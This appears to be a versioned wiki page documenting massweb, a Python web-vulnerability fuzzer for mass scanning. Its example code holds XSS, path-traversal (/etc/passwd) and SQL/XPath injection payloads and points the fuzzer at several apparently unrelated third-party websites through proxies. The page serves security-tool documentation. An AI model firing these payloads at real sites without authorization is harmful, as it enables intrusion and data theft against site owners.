Versions Compared

Old Version 7

changes.mady.by.user Alejandro Caceres

Saved on

compared with

New Version Current

changes.mady.by.user Alejandro Caceres

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

*massweb is currently beta-level software, we encourage you to submit bugs by emailing contact@hyperiongray.com.

The Problem it Solves

In PunkSPIDER 3.0 (the release we're currently working on) we have to scan several hundred million hosts in a very short amount of time over a Hadoop distributed cluster. There's a few big challenges with this:

...

Code Block
languagepy
titleWeb App Fuzzing Example 1
linenumberstrue
	from massweb.payloads.payload import Payload
    xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"])
    trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list = ["trav"])
    sqli_xpathi_payload = Payload("')--", check_type_list = ["sqli", "xpathi"])

    wf = WebFuzzer(num_threads = 30, time_per_url = 5, proxy_list = [{"http":"http://user:password@10.0.0.1:3089/"}, {"http":"http://user:password@10.0.0.2:3089/"}])
    wf.add_payload(xss_payload)
    wf.add_payload(trav_payload)
    wf.add_payload(sqli_xpathi_payload)
    wf.add_target_from_url("http://course.hyperiongray.com/vuln1")
    wf.add_target_from_url("http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/")
    wf.add_target_from_url("http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E")
    wf.add_target_from_url("http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1")
    wf.add_target_from_url("http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1")
    wf.add_target_from_url("http://www.dobrevsource.org/index.php?id=1")

    print "Targets list pre post determination:"
    for target in wf.targets:
        print target

    print "Targets list after additional injection points have been found:"
    wf.determine_posts_from_targets()
    for target in wf.targets:
        print target.url, target.data

    print "FuzzyTargets list:"
    wf.generate_fuzzy_targets()
    for ft in wf.fuzzy_targets:
        print ft, ft.ttype, ft.data

    print "Results of our fuzzing:"
    for r in wf.fuzz():
        print r, r.fuzzy_target.ttype, r.fuzzy_target.payload

...

Let's run through the above code, first we create a Payload object, where we add the payload string and a check type list. The check_type_list marks the vulnerability or vulnerabilities that your payload is testing for - valid ones are: mxi (mail header injection), osci (os command injection), sqli (SQL injection), trav (path traversal), xpathi (XPath injection), and xss (cross site scripting). The first two test for XSS and Path Traversal, while the third one is a valid payload for both SQL Injection and XPath Injection. Then we instantiate the WebFuzzer() object, passing in some of our favorite parameters num_threads and time_per_url, and add the payloads to it. Next up, we add our targets, we chose in the above to just add targets via a URL, but this could also be done by adding a Target object and the .add_target() method, which would look something like the following:

Code Block
	from massweb.fuzzers.web_fuzzer import WebFuzzer
    wf = WebFuzzer()
    target_1 = Target("http://www.hyperiongray.com")
	target_2 = Target("http://course.hyperiongray.com/vuln1", data = {"password" : "blah"}, ttype = "post")

...